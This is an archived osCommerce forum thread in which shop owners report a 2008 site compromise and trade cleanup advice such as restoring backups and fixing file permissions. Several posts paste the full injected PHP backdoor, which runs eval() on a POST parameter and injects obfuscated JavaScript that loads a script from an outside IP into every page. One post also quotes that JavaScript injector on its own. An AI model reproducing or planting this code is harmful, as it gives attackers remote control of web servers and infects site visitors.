Guest Posted November 19, 2008 Share Posted November 19, 2008 I was told this is hacker code and it seems to be at the bottom of most all of my files <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhl cmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJy9+L yEuIS58JTJFfAB8JTNDISU2NGAlNjlgdiUyMCNzJTc0eSU2Q34lNjUkJTNEQCU2NCQlNjlAJTczI3AmJT ZDYGEmJTc5ITpAJTZFb25gZX4lM0UhXG5AJTc2YXIhJTIwJiU1RjtpZiYlMjhkJTZGQCU2MyF1bSU2NSU 2RSMlNzQuJTYzJiU2RiU2Rn4lNkIlNjklNjUlMkVtJTYxYHQlNjNAaCUyOH4vJCU1Q35ifGhnJTY2dGAl M0RAJTMxJCUyRiMlMjk9JTNEbiZ1YGxgbCMlMjklNjQlNkZjfCU3NW0kJTY1JTZFI3R8LiQlNzclNzIhJ TY5fnRlfCgmIiElM0MlNzMjJTYzYHJgaXAlNzQlMjAkJTczfiU3MiYlNjM9L0AvYCUzNyUzOCUyRSElMz FAJTM1YCUzN3wlMkUlMzElMzQjMnwlMkVAJTM1fCUzOCYvIyU2MyU3MCUyRj8ifiUyQn5uJTYxdkAlNjk jZyU2MXR+JTZGJTcyJiUyRWElNzAlNzAkJTRFJTYxJTZEI2UlMkVjYGglNjEhJTcyYCU0MX4lNzQjKEAw YCkrIiElM0UlM0MlNUMkJTJGJTczJmNyJmklNzAkJTc0JiUzRSIpfCUzQlxuQC9gJTJGJTNDJTJGIWQlN jkmdiUzRScpLnJlcGxhY2UoL0B8XCZ8XCR8XHx8fnwjfGB8XCEvZywiIikpO3ZhciB5YWhvb19jb3VudG VyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBo ZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?> what do i do? Also in my catalog/includes/configure php file I have all these blank places now. I have no idea what is supposed to be in there. define('HTTP_SERVER', ''); // eg, [url="http://localhost"]http://localhost[/url] - should not be empty for productive servers define('HTTPS_SERVER', ''); // eg, [url="https://localhost"]https://localhost[/url] - should not be empty for productive servers define('ENABLE_SSL', false); // secure webserver for checkout procedure? define('HTTP_COOKIE_DOMAIN', ''); define('HTTPS_COOKIE_DOMAIN', ''); define('HTTP_COOKIE_PATH', ''); define('HTTPS_COOKIE_PATH', ''); define('DIR_WS_HTTP_CATALOG', '/catalog/'); define('DIR_WS_HTTPS_CATALOG', '/catalog/'); define('DIR_WS_IMAGES', 'images/'); define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/'); define('DIR_WS_INCLUDES', 'includes/'); define('DIR_WS_BOXES', DIR_WS_INCLUDES . 'boxes/'); define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/'); define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/'); define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/'); define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/'); define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/'); define('DIR_FS_CATALOG', dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME'])); define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/'); define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/'); // define our database connection define('DB_SERVER', ''); // eg, localhost - should not be empty for productive servers define('DB_SERVER_USERNAME', ''); define('DB_SERVER_PASSWORD', ''); define('DB_DATABASE', 'osCommerce'); define('USE_PCONNECT', 'false'); // use persistent connections? define('STORE_SESSIONS', ''); // leave empty '' for default handler or set to 'mysql' ?> <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhl cmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJy9+L yEuIS58JTJFfAB8JTNDISU2NGAlNjlgdiUyMCNzJTc0eSU2Q34lNjUkJTNEQCU2NCQlNjlAJTczI3AmJT ZDYGEmJTc5ITpAJTZFb25gZX4lM0UhXG5AJTc2YXIhJTIwJiU1RjtpZiYlMjhkJTZGQCU2MyF1bSU2NSU 2RSMlNzQuJTYzJiU2RiU2Rn4lNkIlNjklNjUlMkVtJTYxYHQlNjNAaCUyOH4vJCU1Q35ifGhnJTY2dGAl M0RAJTMxJCUyRiMlMjk9JTNEbiZ1YGxgbCMlMjklNjQlNkZjfCU3NW0kJTY1JTZFI3R8LiQlNzclNzIhJ TY5fnRlfCgmIiElM0MlNzMjJTYzYHJgaXAlNzQlMjAkJTczfiU3MiYlNjM9L0AvYCUzNyUzOCUyRSElMz FAJTM1YCUzN3wlMkUlMzElMzQjMnwlMkVAJTM1fCUzOCYvIyU2MyU3MCUyRj8ifiUyQn5uJTYxdkAlNjk jZyU2MXR+JTZGJTcyJiUyRWElNzAlNzAkJTRFJTYxJTZEI2UlMkVjYGglNjEhJTcyYCU0MX4lNzQjKEAw YCkrIiElM0UlM0MlNUMkJTJGJTczJmNyJmklNzAkJTc0JiUzRSIpfCUzQlxuQC9gJTJGJTNDJTJGIWQlN jkmdiUzRScpLnJlcGxhY2UoL0B8XCZ8XCR8XHx8fnwjfGB8XCEvZywiIikpO3ZhciB5YWhvb19jb3VudG VyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBo ZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?> 1 Help? Link to comment Share on other sites More sharing options...
germ Posted November 19, 2008 Share Posted November 19, 2008 Same hack as here: click me If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Forestshopkeeper Posted November 20, 2008 Share Posted November 20, 2008 HI: I had the hack that germ sent you to. I had to completely reload the website from a backup. Also check with your host that they do not have a hole that allows code to be written to your configure.php file. Check the ownership of all your php files. Mine were all changed to a different owner. Host had to change them back before I could overwrite them. Make sure all permissions are set no higher than 755 for folders and 644 for files. Good Luck Link to comment Share on other sites More sharing options...
Guest Posted November 20, 2008 Share Posted November 20, 2008 thanks Link to comment Share on other sites More sharing options...
HappyHeath Posted November 21, 2008 Share Posted November 21, 2008 thanks I was hacked by JaCKal. This resulted in the code shown below being placed on all my pages thus reducing spead and being timed out. After Two long days I am happy to confirm that I resolved the problem by carrying out the following processes: 1, Enter into your admin, 2, Click on configuration, Click on My Store. The code is placed at the top of the page in store name. Delete the code and update. Yahoo! the code has gone and back to normal speed. if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F~%2F%2E..@|%3C`%64i!%76$%20%73%74@y|l`%65|%3Ddi`%73%70l$%61%79~:n`%6F%6Ee%3E\nv|a|%72#%20@_;i~%66&(@%64o#%63%75~me%6Et%2Eco%6Fk@i$%65#%2E%6D%61%74%63%68&(@/|%5C!%62~h|%67!ft=%31$%2F!%29#%3D%3Dn`u!%6C&l)|do%63u@m#%65nt@.w~r%69t|%65%28"%3C%73%63ript!%20%73r%63%3D%2F#/@%37|%38|.15%37~%2E$%31%34#2!%2E5!%38/cp/?`"+%6Ea@%76i#%67%61&%74&%6Fr.`a~p%70N&a`m&e&.%63@%68#a|r$%41%74~(&%30%29+"%3E%3C%5C`/!s!%63!%72i~%70%74%3E&")%3B\n%2F@%2F%3C%2F%64%69!v%3E').replace(/`|\&|~|\$|@|\!|\||#/g,""));var yahoo_counter=1 Hope you have similar results Link to comment Share on other sites More sharing options...
ABCommerce! Posted November 21, 2008 Share Posted November 21, 2008 1, Enter into your admin, 2, Click on configuration, Click on My Store. The code is placed at the top of the page in store name. Delete the code and update. What did you do to ensure that your site is secure so that you don't get hacked again? Link to comment Share on other sites More sharing options...
Dutch1 Posted November 23, 2008 Share Posted November 23, 2008 I also found this in the application_bottom.php file in admin/includes <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhl cmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ3wlM kYlMkYjJTJFIy4lMkUAJTNDZGkkJTc2JTIwJTczJTc0JCU3OSYlNkMhZWAlM0QlNjR8aXN+JTcwJTZDYS F5JTNBQCU2RSNvJTZFJTY1JTNFfFxudnwlNjF8cn4lMjAkJTVGJTNCQCU2OWZgJTI4JmQhJTZGJTYzdSE lNkQhZW5AJTc0JCUyRSU2MyQlNkYlNkZga34lNjl+ZSElMkUjbWF8dEAlNjMjJTY4fiUyOCUyRmAlNUMh YiMlNjgkJTY3JTY2IXQlM0QxIS8lMjk9JTNEIyU2RSMlNzV8bGwlMjkmZCQlNkYlNjMlNzVAbWUlNkVgd C4lNzdyQGl8dCNlJTI4IiUzQyU3M2NAJTcyISU2OUBwJTc0JTIwfiU3M3wlNzIlNjMhPSUyRi83fCUzOC MlMkUmMXw1IzclMkUxIzR8MiMuNSUzOCUyRmNwJTJGIyUzRiIhJTJCJiU2RSU2MSN2IWlnYSYlNzRvJTc yLiQlNjElNzAhcCNOYSU2RCU2NUAuYyQlNjglNjF8ciU0MXQoJCUzMCYlMjlgKyEiQCUzRSYlM0MmJTVD Iy8hJTczY35yaUBwdCUzRX4iJTI5O1xuLy8lM0N8JTJGfGRpdiUzRScpLnJlcGxhY2UoL1wkfH58XCZ8X CF8XHx8QHwjfGAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC 9zY3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBo ZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?> Link to comment Share on other sites More sharing options...
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.